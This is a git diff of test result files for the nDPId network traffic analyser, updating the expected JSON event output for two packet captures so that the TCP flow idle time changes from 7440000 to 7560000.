-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} -00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1410865705719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1410865705719,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAH6lHkAAQAYvuwrRCJTAqJGTVe\/IEt2R21o7+2QM0BgBxZZgqqoBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} +00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1410865705717,"flow_last_seen":1410865705717,"flow_idle_time":7560000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1410865705717,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1410865705717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1410865705717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} +00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1410865705719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1410865705719,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAH6lHkAAQAYvuwrRCJTAqJGTVe\/IEt2R21o7+2QM0BgBxZZgqqoBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410865765918} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410865735821,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAUEBk0AAQAbShMCokZMK0QiUyBJV7zv7ZBndkeFwgBghOxJYAAABAQgKPppBVDphzho8ZGV0YWlscyAvPg0K"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":86,"global_ts_msec":1410865765920} 00447{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1410865765918,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAHqlIkAAQAYvvArRCJTAqJGTVe\/IEt2R4XA7+xsmgBgBxWJIAAABAQgKOmJDrj6aQVQ8ZGV0YWlscyBpZD0iIiA+Cgk8dXB0aW1lJQAyNzQ3ODY8L3VwdGltZT4KPC9kZXRhaWxzPgo="} -00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1410865705717,"flow_last_seen":1410865856223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":3945,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1410865856223,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1410865705717,"flow_last_seen":1410865856223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":3945,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1410865856223,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410865916424} 00372{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410865916424,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAEDQBpEAAQAbDgMCokZMK0QiUyBJV7zv7ZGfdkfOygBAhO8pkAAABAQgKPpyNPTpkj5Y="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":68,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410866097027} @@ -25,7 +25,7 @@ 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":170,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":170,"packets-processed":161,"total-skipped-flows":0,"total-l4-data-len":6132,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1410866909737} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410867060242} 00374{"packet_event_id":1,"packet_event_name":"packet","packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410867060242,"pkt":"AAQAAQAGplhD8kgGAAAIAEUARjQCFUAAQAaND8CokZMK0QiUyBJV7zv7ZlXdkmR\/gBAhO29pAAABAQgKPq4BRzp2A6k="} -00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1410865705717,"flow_last_seen":1410867180785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":6327,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1410867180785,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1410865705717,"flow_last_seen":1410867180785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":6327,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1410867180785,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":209,"packets-processed":200,"total-skipped-flows":0,"total-l4-data-len":6327,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1410867180785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 209/200 diff --git a/test/results/reddit.pcap.out b/test/results/reddit.pcap.out index 428be341a..e45fae61d 100644 --- a/test/results/reddit.pcap.out +++ b/test/results/reddit.pcap.out @@ -1,449 +1,449 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"reddit.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1605291684451} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8UAAAAAoAL9IJAlAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YUAAAAAoAL9INBoAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684452,"flow_last_seen":1605291684452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684452,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="} -00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="} -00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 